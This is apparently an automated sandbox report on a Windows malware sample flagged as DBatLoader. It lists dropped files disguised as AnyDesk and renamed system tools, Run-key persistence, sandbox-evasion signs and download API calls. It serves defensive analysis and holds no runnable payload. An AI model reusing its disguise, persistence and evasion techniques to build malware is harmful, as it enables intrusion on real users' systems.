Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll

Source: C:\Users\Public\Libraries\AnyDesk.PIF

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\colorcpl.exe

Window detected: Number of UI elements: 12

Source: saw.bat

Static file information: File size 2921546 > 1048576

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000003.1697402992.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002092E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002095E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1674600317.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1677791285.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1682932441.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1694541931.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1695876898.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1696995181.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1698338645.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1697396433.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000E.00000003.1818028367.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000010.00000000.1825056965.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000014.00000002.1831678845.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1848358095.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000002.1950757304.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1953053256.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1957430051.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.exe.2.dr, alpha.pif.14.dr
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 0000000F.00000003.1821823925.0000000005920000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942712119.0000000000C21000.00000020.00000001.01000000.0000000C.sdmp, xpha.pif.15.dr
Source:	Binary string: certutil.pdb source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source:	Binary string: easinvoker.pdbH source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1674600317.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1677791285.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1682932441.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1694541931.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1695876898.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1696995181.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1698338645.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1697396433.00007FF782402000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 0000000E.00000003.1818028367.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, alpha.pif, 00000010.00000000.1825056965.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000014.00000002.1831678845.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 00000016.00000000.1848358095.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000002.1950757304.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001B.00000002.1953053256.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1957430051.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, alpha.exe.2.dr, alpha.pif.14.dr
Source:	Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 00000009.00000003.1697402992.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1822830202.00000000219AE000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002092E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1822830202.000000002197D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1848830449.000000000286E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.0000000020976000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1864944694.000000002095E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1849834813.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1698042458.000000000286B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 0000000F.00000003.1821823925.0000000005920000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942712119.0000000000C21000.00000020.00000001.01000000.0000000C.sdmp, xpha.pif.15.dr
Source:	Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 9.2.AnyDesk.PIF.2aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: alpha.exe.2.dr

Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]

Source: C:\Users\Public\Libraries\AnyDesk.PIF

Code function: 9_2_02AB894C LoadLibraryW,GetProcAddress,FreeLibrary,

9_2_02AB894C

Source: alpha.exe.2.dr	Static PE information: section name: .didat
Source: kn.exe.4.dr	Static PE information: section name: .didat
Source: alpha.pif.14.dr	Static PE information: section name: .didat

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6A29F3668 push rsp; ret	6_2_00007FF6A29F3669
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ACD2FC push 02ACD367h; ret	9_2_02ACD35F
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AA63AE push 02AA640Bh; ret	9_2_02AA6403
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AA63B0 push 02AA640Bh; ret	9_2_02AA6403
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AA332C push eax; ret	9_2_02AA3368
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ACC378 push 02ACC56Eh; ret	9_2_02ACC566
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AAC349 push 8B02AAC1h; ret	9_2_02AAC34E
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ACD0AC push 02ACD125h; ret	9_2_02ACD11D
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB306B push 02AB30B9h; ret	9_2_02AB30B1
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB306C push 02AB30B9h; ret	9_2_02AB30B1
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ACD1F8 push 02ACD288h; ret	9_2_02ACD280
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ABF108 push ecx; mov dword ptr [esp], edx	9_2_02ABF10D
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ACD144 push 02ACD1ECh; ret	9_2_02ACD1E4
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AA6782 push 02AA67C6h; ret	9_2_02AA67BE
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AA6784 push 02AA67C6h; ret	9_2_02AA67BE
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AAD5A0 push 02AAD5CCh; ret	9_2_02AAD5C4
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AAC56C push ecx; mov dword ptr [esp], edx	9_2_02AAC571
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ACC570 push 02ACC56Eh; ret	9_2_02ACC566
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ABAAE0 push 02ABAB18h; ret	9_2_02ABAB10
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB8AD8 push 02AB8B10h; ret	9_2_02AB8B08
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02ABAADF push 02ABAB18h; ret	9_2_02ABAB10
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AACA1E push 02AACD72h; ret	9_2_02AACD6A
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AACBEC push 02AACD72h; ret	9_2_02AACD6A
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB886C push 02AB88AEh; ret	9_2_02AB88A6
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02B14850 push eax; ret	9_2_02B14920
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB790C push 02AB7989h; ret	9_2_02AB7981
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB6948 push 02AB69F3h; ret	9_2_02AB69EB
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB6946 push 02AB69F3h; ret	9_2_02AB69EB
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB5E7C push ecx; mov dword ptr [esp], edx	9_2_02AB5E7E
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Code function: 9_2_02AB2F60 push 02AB2FD6h; ret	9_2_02AB2FCE
Source: C:\Users\Public\alpha.pif	Code function: 16_2_008671ED push ecx; ret	16_2_00867200

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Puyiaiob.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\AnyDesk.PIF	Jump to dropped file

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_00406EEB ShellExecuteW,URLDownloadToFileW,

19_2_00406EEB

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Puyiaiob.PIF	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe	Jump to dropped file
Source: C:\Users\Public\kn.exe	File created: C:\Users\Public\Libraries\AnyDesk.PIF	Jump to dropped file

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\kn.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 19_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

19_2_0041AADB

Source: C:\Users\Public\Libraries\AnyDesk.PIF	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Puyiaiob			Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Puyiaiob			Jump to behavior

Source: C:\Users\Public\Libraries\AnyDesk.PIF

Code function: 9_2_02ABAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_02ABAB1C

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2A50000 memory commit 500006912
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2A51000 memory commit 500178944
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2A7D000 memory commit 500002816
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2A7E000 memory commit 500350976
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2AD4000 memory commit 501014528
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2BCC000 memory commit 500006912
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2BCE000 memory commit 500015104
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory allocated: 2AA0000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory allocated: 2AA1000 memory commit 500178944	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory allocated: 2ACD000 memory commit 500002816	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory allocated: 2ACE000 memory commit 500350976	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory allocated: 2B24000 memory commit 501014528	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory allocated: 2C1C000 memory commit 500006912	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Memory allocated: 2C1E000 memory commit 500015104	Jump to behavior
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2AC0000 memory commit 500006912
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2AC1000 memory commit 500178944
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2AED000 memory commit 500002816
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2AEE000 memory commit 500350976
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2B44000 memory commit 501014528
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2C3C000 memory commit 500006912
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Memory allocated: 2C3E000 memory commit 500015104

Delayed program exit found

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_0040F7E2 Sleep,ExitProcess,		19_2_0040F7E2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 19_2_06F50519 Sleep,ExitProcess,		19_2_06F50519

Opens the same file many times (likely Sandbox evasion)

Source: C:\Windows\SysWOW64\colorcpl.exe

File opened: \Device\RasAcd count: 159149

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		19_2_0041A7D9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		19_2_06F5B510

Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 9518			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: foregroundWindowGot 1762			Jump to behavior

Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.6 %
Source: C:\Users\Public\kn.exe	API coverage: 0.8 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.6 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.5 %
Source: C:\Users\Public\alpha.pif	API coverage: 6.2 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 5.4 %

Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6692	Thread sleep time: -46000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6712	Thread sleep time: -189000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6712	Thread sleep time: -28554000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\xpha.pif	Last function: Thread delayed

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	3_2_00007FF7823E2978
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	3_2_00007FF7823E823C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,	3_2_00007FF7823F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	3_2_00007FF7823D1560
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	3_2_00007FF7823D35B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF7823E2978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF7823E823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF7823F7B4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF7823D1560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF7823D35B8
